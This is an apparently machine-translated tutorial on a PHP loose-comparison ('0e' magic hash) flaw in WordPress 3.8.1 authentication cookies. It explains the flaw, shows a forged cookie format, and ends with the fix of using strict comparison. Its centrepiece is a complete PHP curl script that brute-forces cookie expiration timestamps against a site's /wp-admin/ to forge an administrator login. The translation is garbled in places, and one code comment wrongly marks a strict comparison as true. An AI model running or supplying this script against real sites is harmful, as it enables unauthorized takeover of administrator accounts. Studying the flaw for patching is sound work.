1 PHP is weakly typed
PHP is a weakly typed language, so variables will be automatically type converted due to different usage scenarios. Use == and in PHP! = When performing equality judgment, type conversion will be performed automatically. Use === and ! == The type will not be automatically converted when making judgments.
<span>1</span> <?<span>php </span><span>2</span><span>$a</span> = 3<span>; </span><span>3</span><span>$b</span> = '3vic'<span>; </span><span>4</span><span>var_dump</span>(<span>$a</span> == <span>$b</span>);<span>//</span><span>true</span><span>5</span><span>var_dump</span>(<span>$a</span> != <span>$b</span>);<span>//</span><span>false</span><span>6</span><span>var_dump</span>(<span>$a</span> === <span>$b</span>);<span>//</span><span>true</span><span>7</span><span>var_dump</span>(<span>$a</span> !== <span>$b</span>);<span>//</span><span>false</span><span>8</span> ?>
2 WordPress code
<span>1</span> <?<span>php
</span><span>2</span><span>//</span><span> WordPress 3.8.1</span><span>3</span><span>if</span> (<span>$hmac</span> != <span>$hash</span><span>) {}
</span><span>4</span><span>//</span><span> WordPress 3.8.2</span><span>5</span><span>if</span> ( hash_hmac('md5', <span>$hmac</span>, <span>$key</span>) !== hash_hmac('md5', <span>$hash</span>, <span>$key</span><span>) ) {}
</span><span>6</span> ?>wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|<span>1433403595</span>|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 format is wordpress_ + m d5(siteurl) Where siteurl is the URL of WordPress. The website address here is http://www.test.ichunqiu<span>, and after </span>md5 encryption, it is c47f4a97d0321c1980bb76fc00d1e78f<span></span>. Other parts can also be omitted.
| Corresponding variable | $username | $expiration | $hmac |
| cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
wp-includes/pluggable.php Lines 543-549
<span>1</span> <?<span>php
</span><span>2</span><span>$key</span> = wp_hash(<span>$username</span> . <span>$pass_frag</span> . '|' . <span>$expiration</span>, <span>$scheme</span><span>);
</span><span>3</span><span>$hash</span> = hash_hmac('md5', <span>$username</span> . '|' . <span>$expiration</span>, <span>$key</span><span>);
</span><span>4</span><span>if</span> ( <span>$hmac</span> != <span>$hash</span><span> ) {
</span><span>5</span> do_action('auth_cookie_bad_hash', <span>$cookie_elements</span><span>);
</span><span>6</span><span>return</span><span>false</span><span>;
</span><span>7</span> }$username username, $expiration expiration date, and because the username is fixed, only $expiration is controllable , so we can change $hash<span></span> by changing $expiration .
$hmac == $hash true, the strings are completely equal or $hmac is equal to 0 at the same time $hash<span></span> is a string starting with a character; change the $hmac value in the client’s cookie to 0, and then write in the line above if ( $hmac != $hash ) { var_dump($hmac);die()<span>;</span>I found that the result of printing $hmac is string '0' instead of int 0, so is there a way to make the string To recognize it as an integer, the code is as follows:
<span>1</span> <?<span>php
</span><span>2</span><span>var_dump</span>('0' == '0e156464513131');<span>//</span><span>true</span>0e156464513131 will be recognized as 0 multiplied by 10 to the power of 156464513131, which is still 0; therefore, when $hash starts with 0e and is followed by all When it is a number, it will be equal to when the value of $hmac<span></span> is '0', so we can set the client's cookie to something like wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 and then continuously update the expiration time (now 1 433403595 position) to collide with the server side. Once the value of $hash starts with 0e and is followed by numbers, it can be verified and passed. Assuming that the collision is successful, modify the browser's cookie and directly access the backend address to successfully log in to the backend.
3 Test script
By changing the expiration time value in the client cookie, constantly trying to log in to the backend, and finding out the timestamp that can enter the backend, thereby realizing cookie forgery login backend.
<span> 1</span> <?<span>php
</span><span> 2</span><span>/*</span><span> 3</span><span> 4</span><span>本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
</span><span> 5</span><span>传入两个值
</span><span> 6</span><span> WordPress 的主页 $host
</span><span> 7</span><span> 管理员用户名 $root
</span><span> 8</span><span>*/</span><span> 9</span><span>header</span>("Content-type:text/html;charset=utf-8"<span>);
</span><span>10</span><span>11</span><span>$host</span> = 'http://xxx.xxx.xxx';<span>//</span><span>主页地址 结尾不带'/'</span><span>12</span><span>$root</span> = 'user';<span>//</span><span>管理员用户名</span><span>13</span><span>14</span><span>$url</span> = <span>$host</span>.'/wp-admin/';<span>//</span><span>后台管理地址 </span><span>15</span><span>$sitehash</span>=<span>md5</span>(<span>$host</span><span>);
</span><span>16</span><span>17</span><span>echo</span> "\nWelcome\n\n"<span>;
</span><span>18</span><span>//</span><span>通过时间戳暴力破解cookie 实现伪造cookie</span><span>19</span><span>for</span>(<span>$i</span>=1500000000;<span>$i</span><1600000000;<span>$i</span>++<span>){
</span><span>20</span><span>$cookie</span> = "wordpress_".<span>$sitehash</span>."=".<span>$root</span>."|".<span>$i</span>."|0;";<span>//</span><span>组合构造cookie</span><span>21</span><span>$header</span> = <span>array</span><span>(
</span><span>22</span> "Content-Type:application/x-www-form-urlencoded",
<span>23</span> 'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',
<span>24</span> "Cookie:".<span>$cookie</span>,
<span>25</span><span> );
</span><span>26</span><span>27</span><span>$curl</span> = curl_init(); <span>//</span><span> 启动一个CURL会话 </span><span>28</span> curl_setopt(<span>$curl</span>, CURLOPT_URL, <span>$url</span>); <span>//</span><span> 要访问的地址</span><span>29</span> curl_setopt(<span>$curl</span>, CURLOPT_FOLLOWLOCATION, 1); <span>//</span><span> 使用自动跳转 </span><span>30</span> curl_setopt(<span>$curl</span>, CURLOPT_AUTOREFERER, 1); <span>//</span><span> 自动设置Referer </span><span>31</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPGET, <span>true</span>); <span>//</span><span> 发送一个常规的Post请求 </span><span>32</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTPHEADER, <span>$header</span>); <span>//</span><span> 读取上面所储存的Cookie信息 </span><span>33</span> curl_setopt(<span>$curl</span>, CURLOPT_RETURNTRANSFER, 1); <span>//</span><span> 获取的信息以文件流的形式返回 </span><span>34</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, <span>false</span><span>);
</span><span>35</span> curl_setopt(<span>$curl</span>, CURLOPT_HEADER, 0<span>);
</span><span>36</span> curl_setopt(<span>$curl</span>, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);<span>//</span><span>让curl自动选择版本</span><span>37</span><span>$tmpInfo</span> = curl_exec(<span>$curl</span>); <span>//</span><span> 执行操作</span><span>38</span><span>if</span> (curl_errno(<span>$curl</span><span>)) {
</span><span>39</span><span>echo</span> 'Errno'.curl_error(<span>$curl</span><span>);
</span><span>40</span><span> }
</span><span>41</span> curl_close(<span>$curl</span>); <span>//</span><span> 关闭CURL会话
</span><span>42</span><span>43</span><span> //匹配结果</span><span>44</span><span>if</span>(<span>strstr</span>(<span>$tmpInfo</span>,'我们准备了几个链接供您开始'<span>)){
</span><span>45</span><span>echo</span> "\n".'success : '.<span>$cookie</span>."\n\n"<span>;
</span><span>46</span><span>break</span><span>;
</span><span>47</span> }<span>else</span><span>{
</span><span>48</span><span>echo</span> 'fail : '.<span>$cookie</span>."\n"<span>;
</span><span>49</span><span> }
</span><span>50</span><span>51</span><span> }
</span><span>52</span> ?> Explanation: Theoretically, the 32-bit MD5 value starting with 0e is about one in 300 million, and the chance of hitting an exploitable $expiration is extremely low .
5 Fix
Hash comparison function used in PHP, change == , ! = changed to === and respectively! == Or use MD5 to encrypt the two compared variables again.
Study notes: http://ichunqiu.com/course/167
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
